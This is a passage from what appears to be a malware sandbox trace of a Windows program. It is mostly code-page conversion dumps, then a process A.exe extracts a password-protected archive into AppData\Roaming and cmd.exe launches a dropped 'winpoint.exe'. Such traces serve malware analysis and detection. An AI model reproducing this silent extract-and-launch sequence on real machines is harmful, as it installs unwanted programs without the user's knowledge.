e0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d
\x17e\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x623c\x49\x100", cchWideChar=256, lpMultiByteStr=0x18fcf0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\
x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x01", lpUsedDefaultChar=0x0) returned 256 [0159.177] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0159.177] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdf0, cbMultiByte=256, lpWideCharStr=0x18f750, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ") returned 256 [0159.177] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0159.177] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ戼IĀ", cchSrc=256, lpDestStr=0x18f550, cchDest=256 | out: lpDestStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x191\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x160\x203a\x152\x9d\x17d\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x178\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7
c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d\x17e\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x623c\x49\x100") returned 256 [0159.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x191\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x160\x203a\x152\x9d\x17d\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x178\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\
x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x20ac\x81\x201a\x192\x201e\x2026\x2020\x2021\x2c6\x2030\x160\x2039\x152\x8d\x17d\x8f\x90\x2018\x2019\x201c\x201d\x2022\x2013\x2014\x2dc\x2122\x161\x203a\x153\x9d\x17e\x178\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x623c\x49\x100", cchWideChar=256, lpMultiByteStr=0x18fbf0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03
\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7
\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x01", lpUsedDefaultChar=0x0) returned 256 [0159.178] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x49373c, nSize=0x104 | out: lpFilename="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\A.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\a.exe")) returned 0x2a [0159.180] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x46e664) returned 0x0 [0159.189] GetVersionExA (in: lpVersionInformation=0x18fe94*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x491510, dwBuildNumber=0x9142a8, dwPlatformId=0x491510, szCSDVersion="") | out: lpVersionInformation=0x18fe94*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0159.190] GetVersionExA (in: lpVersionInformation=0x18fe64*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x18fe90, dwMinorVersion=0x100, dwBuildNumber=0x4597c8, dwPlatformId=0xd, szCSDVersion="GenuineIntelã\x06\x05") | out: lpVersionInformation=0x18fe64*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0159.190] SetConsoleCtrlHandler (HandlerRoutine=0x4018da, Add=1) returned 1 [0159.190] SetFileApisToOEM () [0159.190] GetCommandLineW () returned="A.exe x B.7z -psL3117nTGnp393SLZxZy -o\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\" -aoa" [0159.650] SetFileTime (hFile=0x9c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x7a10b8) returned 1 [0159.650] CloseHandle (hObject=0x9c) returned 1 [0159.650] SetFileAttributesW (lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab", dwFileAttributes=0x20) returned 1 [0159.651] SetEvent (hEvent=0x8c) returned 1 [0159.651] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0159.652] SetEvent (hEvent=0x90) returned 1 [0159.652] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0159.653] CloseHandle 
(hObject=0x98) returned 1 [0159.653] CloseHandle (hObject=0x94) returned 1 [0159.653] CloseHandle (hObject=0x90) returned 1 [0159.657] SetConsoleCtrlHandler (HandlerRoutine=0x4018da, Add=0) returned 1 [0159.658] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x0) returned 0x46e664 [0159.658] ExitProcess (uExitCode=0x0) Thread: id = 58 os_tid = 0x888 [0159.582] GetCurrentThreadId () returned 0x888 [0159.582] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0159.582] SetFilePointer (in: hFile=0x80, lDistanceToMove=32, lpDistanceToMoveHigh=0x20dfe34*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x20dfe34*=0) returned 0x20 [0159.582] ReadFile (in: hFile=0x80, lpBuffer=0x3c0000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x20dfe0c, lpOverlapped=0x0 | out: lpBuffer=0x3c0000*, lpNumberOfBytesRead=0x20dfe0c*=0x20000, lpOverlapped=0x0) returned 1 [0159.583] ResetEvent (hEvent=0x84) returned 1 [0159.583] SetEvent (hEvent=0x88) returned 1 [0159.583] WaitForMultipleObjects (nCount=0x2, lpHandles=0x20dfeb0*=0x84, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0159.597] SetFilePointer (in: hFile=0x80, lDistanceToMove=131104, lpDistanceToMoveHigh=0x20dfe34*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x20dfe34*=0) returned 0x20020 [0159.597] ReadFile (in: hFile=0x80, lpBuffer=0x3c0000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x20dfe0c, lpOverlapped=0x0 | out: lpBuffer=0x3c0000*, lpNumberOfBytesRead=0x20dfe0c*=0x20000, lpOverlapped=0x0) returned 1 [0159.598] ResetEvent (hEvent=0x84) returned 1 [0159.598] SetEvent (hEvent=0x88) returned 1 [0159.598] WaitForMultipleObjects (nCount=0x2, lpHandles=0x20dfeb0*=0x84, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0159.615] SetFilePointer (in: hFile=0x80, lDistanceToMove=262176, lpDistanceToMoveHigh=0x20dfe34*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x20dfe34*=0) returned 0x40020 [0159.615] ReadFile (in: hFile=0x80, lpBuffer=0x3c0000, 
nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x20dfe0c, lpOverlapped=0x0 | out: lpBuffer=0x3c0000*, lpNumberOfBytesRead=0x20dfe0c*=0x20000, lpOverlapped=0x0) returned 1 [0159.616] ResetEvent (hEvent=0x84) returned 1 [0159.616] SetEvent (hEvent=0x88) returned 1 [0159.616] WaitForMultipleObjects (nCount=0x2, lpHandles=0x20dfeb0*=0x84, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0159.619] SetFilePointer (in: hFile=0x80, lDistanceToMove=393248, lpDistanceToMoveHigh=0x20dfe34*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x20dfe34*=0) returned 0x60020 [0159.619] ReadFile (in: hFile=0x80, lpBuffer=0x3c0000, nNumberOfBytesToRead=0xe520, lpNumberOfBytesRead=0x20dfe0c, lpOverlapped=0x0 | out: lpBuffer=0x3c0000*, lpNumberOfBytesRead=0x20dfe0c*=0xe520, lpOverlapped=0x0) returned 1 [0159.619] ResetEvent (hEvent=0x84) returned 1 [0159.619] SetEvent (hEvent=0x88) returned 1 [0159.619] WaitForMultipleObjects (nCount=0x2, lpHandles=0x20dfeb0*=0x84, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0159.632] SetEvent (hEvent=0x88) returned 1 [0159.633] SetEvent (hEvent=0x94) returned 1 [0159.633] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0159.652] GetLastError () returned 0x0 [0159.652] SetLastError (dwErrCode=0x0) [0159.652] RtlExitUserThread (Status=0x0) Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6c838000" os_pid = "0x890" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x4c8" cmd_line = "cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" cur_dir = "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT 
